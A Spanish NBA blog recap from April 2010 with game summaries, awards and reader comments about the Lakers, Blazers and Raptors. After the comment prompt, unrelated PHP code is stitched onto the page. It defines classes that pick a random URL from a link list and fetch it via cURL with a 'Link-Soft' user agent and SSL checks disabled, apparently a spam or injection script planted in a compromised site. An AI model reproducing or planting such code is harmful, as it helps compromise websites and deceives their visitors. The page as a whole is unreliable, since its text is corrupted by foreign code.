La Crónica (11/04/2010)

12 de April de 2010 por txusma

Suenan todas las alarmas en L.A. El final de la regular está siendo un auténtico calvario y no trasmiten ninguna sensación que indique estar en condiciones de defender el título. Anoche prácticamente rendían la ventaja campo también contra Orlando en un mal partido de Kobe y Artest. Los Blazers finiquitaron el partido con 3 tiros libres a falta de 3 segundos. La parte positiva es que las posibilidades de evitarlos en primera ronda, con este resultado, son algo menores. Orlando, por su parte, no tuvo grandes problemas para derrotar a unos Cavs sin LeBron. pero con Jamison que sí jugó y se mostró en perfectas condiciones.

La otra incógnita que quedaba por resolver, prácticamente queda para sentencia ya que  los Bulls ganaron su particular final en Toronto. Los Raptors han sido toda la temporada un equipo extraño. Es raro ver que Turkoglu prácticamente coje todos los rebotes o da todas las asistencias de tu equipo, pero que luego se luce anotando apenas 6 puntos. Al final el gran fichaje de este pasado verano, junto con el contratazo a Bargnani se han mostrado como errores.

Los Suns ganaron bien a los Rockets, pero lo van a tener complicado para lograr ventaja campo en primera ronda. El triple empate les perjudica y se enfrenta con sus dos rivales en los últimos dos partidos. El último en Salt Lake, me temo.

Casi nos habíamos acostumbrado a no ver fallar a los Thunder pero ayer tropezaron contra los Warriors a pesar de Durant. Esta noche se juegan parte de sus opciones en el Rose Garden.

Para terminar, los Hornets derrotaron a los Wolves en un partido que ni nos va ni nos viene.

PREMIOS

MVP: Los Suns tienen ante sí un final de temporada complicado pero si Amare Stoudamire juega como ayer (35 puntos y 13 asistencias) tienen más posibilidades de conseguir la ventaja de campo en primera ronda. Joakim Noah también es clave en su equipo y cada que pasa lo parece más. 18 puntos, 19 rebotes y 7 asistencias.

Rookie: Finalmente el ROY se lo jugarán Tyreke Evans y Stephen Curry. El sprint final del de los Warriors está siendo espectacular. El partido de ayer frente los Thunder fue otra muestra más: 25 puntos, 7 rebotes y 7 asistencias.

Sorpresa: Sin Lebron los secundarios de los Cavs tiene la oportunidad de lucirse. Es el caso de Delonte West que se fue a los 21 puntos a los que añadió 7 asistencias y 5 rebotes. Los 19 rebotes de Hedo Turkoglu también merecen ser destacados

Decepción: 5 puntos y 3 rebotes no es aportación suficiente para una teórica estrella de la liga como Al Jefferson. ¿Se han acabado sus tiempos en Minnesotta?

Esfuerzo en vano: “… a pesar de Durant”. Y es que Kevin Durant suele cumplir en casi todos los partidos lo que no quiere decir que su equipo, aún joven y en formación, acostumbre a ganar. Los 40 puntos y 10 rebotes de ayer se quedan sin recompensa.

Comenta

10 comentarios a esta entrada

  1. Love Denise dice:
    #1

    hombre, si McMallon le ha ganado la partida al Dios Phil, el mismo que, pese a sus manos repletas de anillos (que mucho merito tiene) diseña una jugada para que el gran tirador de 3 Pau Gasol anote un triple para empatar el partido. Por cierto, el pase de Odom al pie de Pau no tiene desperdicio, al igual que la falta cometida a 3 segundos del final por un tío curtido en mil batallas como Fisher. Incomprensible desde mi punto de vista.

    Si había alguna posibilidad que Bosh renovase con los canadienses, el partido de ayer le habrá quitado las dudas.

      Citar

  2. LEmontus dice:
    #2

    Dios phil ?? me parece indigante que se le catalogue simplemente como buen entrenador….

    Yo ya comenté en la última crónica que portland no es ni mucho menos la cenicienta y dará guerra para mi gusto son un equipazo, se criticó la contratación de camby y es algo inentendible porque es una pieza importante en estos blazers.

    No creo que los lakers se estén dejando ir como piensan muchos pero lo que si está claro es que Po es otro mundo haber si empiezan yaaa jajaj.

      Citar

  3. Love Denise dice:
    #3

    lemontus, sabes qué es la ironía? mi comentario iba en ese sentido

      Citar

  4. Txusma dice:
    #4

    Y ojo pq los Blazers jugaron sin Roy buena parte del partido. A lo mejor por eso les fue tan bien. Se colapsaría McMillan al tener que pensar alternativas al Roy-Sistema? 😉

      Citar

  5. Vader dice:
    #5

    Creo que McMillan es un buen técnico para temporada regualar pero no para playoff donde hace falta tener un poco más de “cintura” táctica y no depender tanto de un sólo jugador para anotar muchos puntos. Hombre si ese jugador se llama Shaquille O’Neal o MIchael Jordan te puede funcionar pero no es lo mismo si se llama Brandon Roy…

    Vamos que no veo a Portland pasar de la primera ronda.

    Saludos

      Citar

  6. sayim dice:
    #6

    Vader, yo no sólo no veo a Blazers en segunda ronda sino que creo que serán barridos por los Lakers (tal vez 4-1). Y no estoy de acuerdo en lo de que McMillan es un buen técnico para RS.

      Citar

  7. Tobal dice:
    #7

    Los Raptors están decepcionando bastante,son un equipo que no tiene continuidad en su juego,no dominan el rebote y dependen demasiado del talento de Bosh.

      Citar

  8. sergio dice:
    #8

    Pues yo no tengo la mas minima duda acerca del nivel de los Lakers en Playoffs. Me pasa algo parecido con el primer partido España-EEUU. Nunca crei que los recursos de Aito fueran los que se mostraron en la paliza que nos dio el combinado americano en los partidos de grupo. Algo parecido pasa con Phil… dudo que no sea un momento de relax.

      Citar

  9. NBA LAKERS BLOG dice:
    #9

    Excelente el resumen, como siempre.

    Te espero en nuestro blog de los Lakers, que no se te muy de seguido! 😉

    Un fuerte abrazo!

    -NM-

      Citar

  10. Love Denise dice:
    #10

    Teniendo en cuenta las lesiones de oden y Przybilla, pienso que la temporada de los Blazers está siendo bastante buena. Con la plantilla al completo, pienso que tendrían el 3er mejor equipo sólo por detrás de Lakers y Mavs (desde el trade con Washington). Lástima las lesiones,
    by the way, Curry le ha quitado el record de triples a Rudy.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>